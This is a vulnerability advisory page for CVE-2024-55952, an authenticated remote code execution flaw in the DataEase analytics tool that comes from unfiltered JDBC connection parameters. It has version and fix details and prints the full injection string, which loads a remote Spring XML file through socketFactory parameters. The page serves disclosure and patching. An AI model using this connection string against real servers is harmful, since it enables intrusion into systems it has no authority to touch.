First published: Wed Dec 18 2024(Updated: )
DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Credit: security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
Dataease | <1.18.27 | |
Dataease | <1.18.27 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2024-55952 has a high severity due to the potential for remote code execution by authenticated users.
Fix CVE-2024-55952 by updating DataEase to the latest version beyond 1.18.27 or implementing input validation for JDBC connection parameters.
Users of DataEase versions prior to 1.18.27 are affected by CVE-2024-55952.
CVE-2024-55952 is a remote code execution vulnerability.
No, CVE-2024-55952 requires authenticated access to exploit the vulnerability.